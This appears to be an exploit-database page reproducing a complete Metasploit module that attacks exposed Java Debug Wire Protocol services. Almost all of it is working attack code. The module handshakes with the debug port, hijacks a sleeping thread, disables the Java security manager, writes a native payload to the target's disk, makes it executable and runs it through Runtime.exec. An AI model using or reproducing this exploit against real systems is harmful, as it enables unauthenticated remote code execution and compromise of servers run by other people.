Java Debug Wire Protocol Remote Code Execution

2014.06.17
Credit: Redsadic
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE include Msf::Exploit::FileDropper HANDSHAKE = "JDWP-Handshake" REQUEST_PACKET_TYPE = 0x00 REPLY_PACKET_TYPE = 0x80 # Command signatures VERSION_SIG = [1, 1] CLASSESBYSIGNATURE_SIG = [1, 2] ALLCLASSES_SIG = [1, 3] ALLTHREADS_SIG = [1, 4] IDSIZES_SIG = [1, 7] CREATESTRING_SIG = [1, 11] SUSPENDVM_SIG = [1, 8] RESUMEVM_SIG = [1, 9] SIGNATURE_SIG = [2, 1] FIELDS_SIG = [2, 4] METHODS_SIG = [2, 5] GETVALUES_SIG = [2, 6] CLASSOBJECT_SIG = [2, 11] SETSTATICVALUES_SIG = [3, 2] INVOKESTATICMETHOD_SIG = [3, 3] CREATENEWINSTANCE_SIG = [3, 4] REFERENCETYPE_SIG = [9, 1] INVOKEMETHOD_SIG = [9, 6] STRINGVALUE_SIG = [10, 1] THREADNAME_SIG = [11, 1] THREADSUSPEND_SIG = [11, 2] THREADRESUME_SIG = [11, 3] THREADSTATUS_SIG = [11, 4] EVENTSET_SIG = [15, 1] EVENTCLEAR_SIG = [15, 2] EVENTCLEARALL_SIG = [15, 3] # Other codes MODKIND_COUNT = 1 MODKIND_THREADONLY = 2 MODKIND_CLASSMATCH = 5 MODKIND_LOCATIONONLY = 7 MODKIND_STEP = 10 EVENT_BREAKPOINT = 2 EVENT_STEP = 1 SUSPEND_EVENTTHREAD = 1 SUSPEND_ALL = 2 NOT_IMPLEMENTED = 99 VM_DEAD = 112 INVOKE_SINGLE_THREADED = 2 TAG_OBJECT = 76 TAG_STRING = 115 TYPE_CLASS = 1 TAG_ARRAY = 91 TAG_VOID = 86 TAG_THREAD = 116 STEP_INTO = 0 STEP_MIN = 0 THREAD_SLEEPING_STATUS = 2 def initialize super( 'Name' => 'Java Debug Wire Protocol Remote Code Execution', 'Description' => %q{ This module abuses exposed Java Debug Wire Protocol services in order to execute arbitrary Java code remotely. It just abuses the protocol features, since no authentication is required if the service is enabled. }, 'Author' => [ 'Michael Schierl', # Vulnerability discovery / First exploit seen / Msf module help 'Christophe Alladoum', # JDWP Analysis and Exploit 'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module ], 'References' => [ ['OSVDB', '96066'], ['EDB', '27179'], ['URL', 'http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html'], ['URL', 'http://seclists.org/nmap-dev/2010/q1/867'], ['URL', 'https://github.com/schierlm/JavaPayload/blob/master/JavaPayload/src/javapayload/builder/JDWPInjector.java'], ['URL', 'https://svn.nmap.org/nmap/scripts/jdwp-exec.nse'], ['URL', 'http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html'] ], 'Platform' => %w{ linux win }, 'Arch' => ARCH_X86, 'Payload' => { 'Space' => 2048, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux' } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win' } ] ], 'DefaultTarget' => 0, 'License' => MSF_LICENSE, 'DisclosureDate' => 'Mar 12 2010' ) register_options( [ Opt::RPORT(8000), OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]), OptString.new('TMP_PATH', [ false, 'A directory where we can write files. Ensure there is a trailing slash']), ], self.class) register_advanced_options( [ OptInt.new('NUM_RETRIES', [true, 'Number of retries when waiting for event', 10]), ], self.class) end def check connect res = handshake disconnect if res.nil? return Exploit::CheckCode::Unknown elsif res == HANDSHAKE return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end def peer "#{rhost}:#{rport}" end def default_timeout datastore['RESPONSE_TIMEOUT'] end # Establishes handshake with the server def handshake sock.put(HANDSHAKE) return sock.get(datastore['RESPONSE_TIMEOUT']) end # Forges packet for JDWP protocol def create_packet(cmdsig, data="") flags = 0x00 cmdset, cmd = cmdsig pktlen = data.length + 11 buf = [pktlen, @my_id, flags, cmdset, cmd] pkt = buf.pack("NNCCC") pkt << data @my_id += 2 pkt end # Reads packet response for JDWP protocol def read_reply(timeout = default_timeout) response = sock.get(timeout) fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response pktlen, id, flags, errcode = response.unpack('NNCn') response.slice!(0..10) if errcode != 0 && flags == REPLY_PACKET_TYPE fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{errcode}") end response end # Returns the characters contained in the string defined in target VM def solve_string(data) sock.put(create_packet(STRINGVALUE_SIG, data)) response = read_reply return "" unless response return read_string(response) end # Unpacks received string structure from the server response into a normal string def read_string(data) data_len = data.unpack('N')[0] data.slice!(0..3) return data.slice!(0,data_len) end # Creates a new string object in the target VM and returns its id def create_string(data) buf = build_string(data) sock.put(create_packet(CREATESTRING_SIG, buf)) buf = read_reply return parse_entries(buf, [[@vars['objectid_size'], "obj_id"]], false) end # Packs normal string into string structure for target VM def build_string(data) ret = [data.length].pack('N') ret << data ret end # Pack Fixnum for JDWP protocol def format(fmt, value) if fmt == "L" || fmt == 8 return [value].pack('Q>') elsif fmt == "I" || fmt == 4 return [value].pack('N') end fail_with(Failure::Unknown, "Unknown format") end # Unpack Fixnum from JDWP protocol def unformat(fmt, value) if fmt == "L" || fmt == 8 return value[0..7].unpack('Q>')[0] elsif fmt == "I" || fmt == 4 return value[0..3].unpack('N')[0] end fail_with(Failure::Unknown, "Unknown format") end # Parses given data according to a set of formats def parse_entries(buf, formats, explicit=true) entries = [] if explicit nb_entries = buf.unpack('N')[0] buf.slice!(0..3) else nb_entries = 1 end nb_entries.times do |var| if var != 0 && var % 1000 == 0 vprint_status("#{peer} - Parsed #{var} classes of #{nb_entries}") end data = {} formats.each do |fmt,name| if fmt == "L" || fmt == 8 data[name] = buf.unpack('Q>')[0] buf.slice!(0..7) elsif fmt == "I" || fmt == 4 data[name] = buf.unpack('N')[0] buf.slice!(0..3) elsif fmt == "S" data_len = buf.unpack('N')[0] buf.slice!(0..3) data[name] = buf.slice!(0,data_len) elsif fmt == "C" data[name] = buf.unpack('C')[0] buf.slice!(0) elsif fmt == "Z" t = buf.unpack('C')[0] buf.slice!(0) if t == 115 data[name] = solve_string(buf.slice!(0..7)) elsif t == 73 data[name], buf = buf.unpack('NN') end else fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response") end end entries.append(data) end entries end # Gets the sizes of variably-sized data types in the target VM def get_sizes formats = [ ["I", "fieldid_size"], ["I", "methodid_size"], ["I", "objectid_size"], ["I", "referencetypeid_size"], ["I", "frameid_size"] ] sock.put(create_packet(IDSIZES_SIG)) response = read_reply entries = parse_entries(response, formats, false) entries.each { |e| @vars.merge!(e) } end # Gets the JDWP version implemented by the target VM def get_version formats = [ ["S", "descr"], ["I", "jdwp_major"], ["I", "jdwp_minor"], ["S", "vm_version"], ["S", "vm_name"] ] sock.put(create_packet(VERSION_SIG)) response = read_reply entries = parse_entries(response, formats, false) entries.each { |e| @vars.merge!(e) } end def version "#{@vars["vm_name"]} - #{@vars["vm_version"]}" end def is_java_eight version.downcase =~ /1[.]8[.]/ end # Returns reference for all threads currently running on target VM def get_all_threads sock.put(create_packet(ALLTHREADS_SIG)) response = read_reply num_threads = response.unpack('N').first response.slice!(0..3) size = @vars["objectid_size"] num_threads.times do t_id = unformat(size, response[0..size-1]) @threads[t_id] = nil response.slice!(0..size-1) end end # Returns reference types for all classes currently loaded by the target VM def get_all_classes return unless @classes.empty? formats = [ ["C", "reftype_tag"], [@vars["referencetypeid_size"], "reftype_id"], ["S", "signature"], ["I", "status"] ] sock.put(create_packet(ALLCLASSES_SIG)) response = read_reply @classes.append(parse_entries(response, formats)) end # Checks if specified class is currently loaded by the target VM and returns it def get_class_by_name(name) @classes.each do |entry_array| entry_array.each do |entry| if entry["signature"].downcase == name.downcase return entry end end end nil end # Returns information for each method in a reference type (ie. object). Inherited methods are not included. # The list of methods will include constructors (identified with the name "<init>") def get_methods(reftype_id) if @methods.has_key?(reftype_id) return @methods[reftype_id] end formats = [ [@vars["methodid_size"], "method_id"], ["S", "name"], ["S", "signature"], ["I", "mod_bits"] ] ref_id = format(@vars["referencetypeid_size"],reftype_id) sock.put(create_packet(METHODS_SIG, ref_id)) response = read_reply @methods[reftype_id] = parse_entries(response, formats) end # Returns information for each field in a reference type (ie. object) def get_fields(reftype_id) formats = [ [@vars["fieldid_size"], "field_id"], ["S", "name"], ["S", "signature"], ["I", "mod_bits"] ] ref_id = format(@vars["referencetypeid_size"],reftype_id) sock.put(create_packet(FIELDS_SIG, ref_id)) response = read_reply fields = parse_entries(response, formats) fields end # Returns the value of one static field of the reference type. The field must be member of the reference type # or one of its superclasses, superinterfaces, or implemented interfaces. Access control is not enforced; # for example, the values of private fields can be obtained. def get_value(reftype_id, field_id) data = format(@vars["referencetypeid_size"],reftype_id) data << [1].pack('N') data << format(@vars["fieldid_size"],field_id) sock.put(create_packet(GETVALUES_SIG, data)) response = read_reply num_values = response.unpack('N')[0] unless (num_values == 1) && (response[4].unpack('C')[0] == TAG_OBJECT) fail_with(Failure::Unknown, "Bad response when getting value for field") end response.slice!(0..4) len = @vars["objectid_size"] value = unformat(len, response) value end # Sets the value of one static field. Each field must be member of the class type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, the values of # private fields can be set. Final fields cannot be set.For primitive values, the value's type must match # the field's type exactly. For object values, there must exist a widening reference conversion from the # value's type to the field's type and the field's type must be loaded. def set_value(reftype_id, field_id, value) data = format(@vars["referencetypeid_size"],reftype_id) data << [1].pack('N') data << format(@vars["fieldid_size"],field_id) data << format(@vars["objectid_size"],value) sock.put(create_packet(SETSTATICVALUES_SIG, data)) read_reply end # Checks if specified method is currently loaded by the target VM and returns it def get_method_by_name(classname, name, signature = nil) @methods[classname].each do |entry| if signature.nil? return entry if entry["name"].downcase == name.downcase else if entry["name"].downcase == name.downcase && entry["signature"].downcase == signature.downcase return entry end end end nil end # Checks if specified class and method are currently loaded by the target VM and returns them def get_class_and_method(looked_class, looked_method, signature = nil) target_class = get_class_by_name(looked_class) unless target_class fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found") end get_methods(target_class["reftype_id"]) target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature) unless target_method fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") end return target_class, target_method end # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept") def str_to_fq_class(s) i = s.rindex(".") unless i fail_with(Failure::BadConfig, 'Bad defined break class') end method = s[i+1..-1] # Subtr of s, from last '.' to the end of the string classname = 'L' classname << s[0..i-1].gsub(/[.]/, '/') classname << ';' return classname, method end # Gets the status of a given thread def thread_status(thread_id) sock.put(create_packet(THREADSTATUS_SIG, format(@vars["objectid_size"], thread_id))) buf = read_reply(datastore['BREAK_TIMEOUT']) unless buf fail_with(Exploit::Failure::Unknown, "No network response") end status, suspend_status = buf.unpack('NN') status end # Resumes execution of the application or thread after the suspend command or an event has stopped it def resume_vm(thread_id = nil) if thread_id.nil? sock.put(create_packet(RESUMEVM_SIG)) else sock.put(create_packet(THREADRESUME_SIG, format(@vars["objectid_size"], thread_id))) end response = read_reply(datastore['BREAK_TIMEOUT']) unless response fail_with(Exploit::Failure::Unknown, "No network response") end response end # Suspend execution of the application or thread def suspend_vm(thread_id = nil) if thread_id.nil? sock.put(create_packet(SUSPENDVM_SIG)) else sock.put(create_packet(THREADSUSPEND_SIG, format(@vars["objectid_size"], thread_id))) end response = read_reply unless response fail_with(Exploit::Failure::Unknown, "No network response") end response end # Sets an event request. When the event described by this request occurs, an event is sent from the target VM def send_event(event_code, args) data = [event_code].pack('C') data << [SUSPEND_ALL].pack('C') data << [args.length].pack('N') args.each do |kind,option| data << [kind].pack('C') data << option end sock.put(create_packet(EVENTSET_SIG, data)) response = read_reply unless response fail_with(Exploit::Failure::Unknown, "#{peer} - No network response") end return response.unpack('N')[0] end # Parses a received event and compares it with the expected def parse_event(buf, event_id, thread_id) len = @vars["objectid_size"] return false if buf.length < 10 + len - 1 r_id = buf[6..9].unpack('N')[0] t_id = unformat(len,buf[10..10+len-1]) return (event_id == r_id) && (thread_id == t_id) end # Clear a defined event request def clear_event(event_code, r_id) data = [event_code].pack('C') data << [r_id].pack('N') sock.put(create_packet(EVENTCLEAR_SIG, data)) read_reply end # Invokes a static method. The method must be member of the class type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private # methods can be invoked. def invoke_static(class_id, thread_id, meth_id, args = []) data = format(@vars["referencetypeid_size"], class_id) data << format(@vars["objectid_size"], thread_id) data << format(@vars["methodid_size"], meth_id) data << [args.length].pack('N') args.each do |arg| data << arg data << [0].pack('N') end sock.put(create_packet(INVOKESTATICMETHOD_SIG, data)) buf = read_reply buf end # Invokes a instance method. The method must be member of the object's type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods # can be invoked. def invoke(obj_id, thread_id, class_id, meth_id, args = []) data = format(@vars["objectid_size"], obj_id) data << format(@vars["objectid_size"], thread_id) data << format(@vars["referencetypeid_size"], class_id) data << format(@vars["methodid_size"], meth_id) data << [args.length].pack('N') args.each do |arg| data << arg data << [0].pack('N') end sock.put(create_packet(INVOKEMETHOD_SIG, data)) buf = read_reply buf end # Creates a new object of specified class, invoking the specified constructor. The constructor # method ID must be a member of the class type. def create_instance(class_id, thread_id, meth_id, args = []) data = format(@vars["referencetypeid_size"], class_id) data << format(@vars["objectid_size"], thread_id) data << format(@vars["methodid_size"], meth_id) data << [args.length].pack('N') args.each do |arg| data << arg data << [0].pack('N') end sock.put(create_packet(CREATENEWINSTANCE_SIG, data)) buf = read_reply buf end def temp_path return nil unless datastore['TMP_PATH'] unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH') end datastore['TMP_PATH'] end # Configures payload according to targeted architecture def setup_payload # 1. Setting up generic values. payload_exe = rand_text_alphanumeric(4 + rand(4)) pl_exe = generate_payload_exe # 2. Setting up arch specific... case target['Platform'] when 'linux' path = temp_path || '/tmp/' payload_exe = "#{path}#{payload_exe}" if @os.downcase =~ /win/ print_warning("#{peer} - #{@os} system detected but using Linux target...") end when 'win' path = temp_path || './' payload_exe = "#{path}#{payload_exe}.exe" unless @os.downcase =~ /win/ print_warning("#{peer} - #{@os} system detected but using Windows target...") end end return payload_exe, pl_exe end # Invokes java.lang.System.getProperty() for OS fingerprinting purposes def fingerprint_os(thread_id) size = @vars["objectid_size"] # 1. Creates a string on target VM with the property to be getted cmd_obj_ids = create_string("os.name") fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 cmd_obj_id = cmd_obj_ids[0]["obj_id"] # 2. Gets property data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) data_array = [data] runtime_class , runtime_meth = get_class_and_method("Ljava/lang/System;", "getProperty") buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array) fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected String") unless buf[0] == [TAG_STRING].pack('C') str = unformat(size, buf[1..1+size-1]) @os = solve_string(format(@vars["objectid_size"],str)) end # Creates a file on the server given a execution thread def create_file(thread_id, filename) cmd_obj_ids = create_string(filename) fail_with(Failure::Unknown, "Failed to allocate string for filename") if cmd_obj_ids.length == 0 cmd_obj_id = cmd_obj_ids[0]["obj_id"] size = @vars["objectid_size"] data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) data_array = [data] runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "<init>", "(Ljava/lang/String;)V") buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array) fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') file = unformat(size, buf[1..1+size-1]) fail_with(Failure::Unknown, "Failed to create file. Try to change the TMP_PATH") if file.nil? || (file == 0) register_files_for_cleanup(filename) file end # Stores the payload on a new string created in target VM def upload_payload(thread_id, pl_exe) size = @vars["objectid_size"] if is_java_eight runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64;", "getDecoder") buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) else runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "<init>") buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) end unless buf[0] == [TAG_OBJECT].pack('C') fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") end decoder = unformat(size, buf[1..1+size-1]) if decoder.nil? || decoder == 0 fail_with(Failure::Unknown, "Failed to create Base64 decoder object") end cmd_obj_ids = create_string("#{Rex::Text.encode_base64(pl_exe)}") if cmd_obj_ids.length == 0 fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") end cmd_obj_id = cmd_obj_ids[0]["obj_id"] data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) data_array = [data] if is_java_eight runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64$Decoder;", "decode", "(Ljava/lang/String;)[B") else runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B") end buf = invoke(decoder, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array) unless buf[0] == [TAG_ARRAY].pack('C') fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray") end pl = unformat(size, buf[1..1+size-1]) pl end # Dumps the payload on a opened server file given a execution thread def dump_payload(thread_id, file, pl) size = @vars["objectid_size"] data = [TAG_OBJECT].pack('C') data << format(size, pl) data_array = [data] runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "write", "([B)V") buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array) unless buf[0] == [TAG_VOID].pack('C') fail_with(Failure::Unknown, "Exception while writing to file") end end # Closes a file on the server given a execution thread def close_file(thread_id, file) runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close") buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"]) unless buf[0] == [TAG_VOID].pack('C') fail_with(Failure::Unknown, "Exception while closing file") end end # Executes a system command on target VM making use of java.lang.Runtime.exec() def execute_command(thread_id, cmd) size = @vars["objectid_size"] # 1. Creates a string on target VM with the command to be executed cmd_obj_ids = create_string(cmd) if cmd_obj_ids.length == 0 fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") end cmd_obj_id = cmd_obj_ids[0]["obj_id"] # 2. Gets Runtime context runtime_class , runtime_meth = get_class_and_method("Ljava/lang/Runtime;", "getRuntime") buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) unless buf[0] == [TAG_OBJECT].pack('C') fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") end rt = unformat(size, buf[1..1+size-1]) if rt.nil? || (rt == 0) fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()") end # 3. Finds and executes "exec" method supplying the string with the command exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec") if exec_meth.nil? fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()") end data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) data_array = [data] buf = invoke(rt, thread_id, runtime_class["reftype_id"], exec_meth["method_id"], data_array) unless buf[0] == [TAG_OBJECT].pack('C') fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") end end # Set event for stepping into a running thread def set_step_event # 1. Select a thread in sleeping status t_id = nil @threads.each_key do |thread| if thread_status(thread) == THREAD_SLEEPING_STATUS t_id = thread break end end fail_with(Failure::Unknown, "Could not find a suitable thread for stepping") if t_id.nil? # 2. Suspend the VM before setting the event suspend_vm vprint_status("#{peer} - Setting 'step into' event in thread: #{t_id}") step_info = format(@vars["objectid_size"], t_id) step_info << [STEP_MIN].pack('N') step_info << [STEP_INTO].pack('N') data = [[MODKIND_STEP, step_info]] r_id = send_event(EVENT_STEP, data) unless r_id fail_with(Failure::Unknown, "Could not set the event") end return r_id, t_id end # Disables security manager if it's set on target JVM def disable_sec_manager sys_class = get_class_by_name("Ljava/lang/System;") fields = get_fields(sys_class["reftype_id"]) sec_field = nil fields.each do |field| sec_field = field["field_id"] if field["name"].downcase == "security" end fail_with(Failure::Unknown, "Security attribute not found") if sec_field.nil? value = get_value(sys_class["reftype_id"], sec_field) if(value == 0) print_good("#{peer} - Security manager was not set") else set_value(sys_class["reftype_id"], sec_field, 0) if get_value(sys_class["reftype_id"], sec_field) == 0 print_good("#{peer} - Security manager has been disabled") else print_good("#{peer} - Security manager has not been disabled, trying anyway...") end end end # Uploads & executes the payload on the target VM def exec_payload(thread_id) # 0. Fingerprinting OS fingerprint_os(thread_id) vprint_status("#{peer} - Executing payload on \"#{@os}\", target version: #{version}") # 1. Prepares the payload payload_exe, pl_exe = setup_payload # 2. Creates file on server for dumping payload file = create_file(thread_id, payload_exe) # 3. Uploads payload to the server pl = upload_payload(thread_id, pl_exe) # 4. Dumps uploaded payload into file on the server dump_payload(thread_id, file, pl) # 5. Closes the file on the server close_file(thread_id, file) # 5b. When linux arch, give execution permissions to file if target['Platform'] == 'linux' cmd = "chmod +x #{payload_exe}" execute_command(thread_id, cmd) end # 6. Executes the dumped payload cmd = "#{payload_exe}" execute_command(thread_id, cmd) end def exploit @my_id = 0x01 @vars = {} @classes = [] @methods = {} @threads = {} @os = nil connect unless handshake == HANDSHAKE fail_with(Failure::NotVulnerable, "JDWP Protocol not found") end print_status("#{peer} - Retrieving the sizes of variable sized data types in the target VM...") get_sizes print_status("#{peer} - Getting the version of the target VM...") get_version print_status("#{peer} - Getting all currently loaded classes by the target VM...") get_all_classes print_status("#{peer} - Getting all running threads in the target VM...") get_all_threads print_status("#{peer} - Setting 'step into' event...") r_id, t_id = set_step_event print_status("#{peer} - Resuming VM and waiting for an event...") response = resume_vm unless parse_event(response, r_id, t_id) datastore['NUM_RETRIES'].times do |i| print_status("#{peer} - Received #{i + 1} responses that are not a 'step into' event...") buf = read_reply break if parse_event(buf, r_id, t_id) if i == datastore['NUM_RETRIES'] fail_with(Failure::Unknown, "Event not received in #{datastore['NUM_RETRIES']} attempts") end end end vprint_status("#{peer} - Received matching event from thread #{t_id}") print_status("#{peer} - Deleting step event...") clear_event(EVENT_STEP, r_id) print_status("#{peer} - Disabling security manager if set...") disable_sec_manager print_status("#{peer} - Dropping and executing payload...") exec_payload(t_id) disconnect end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top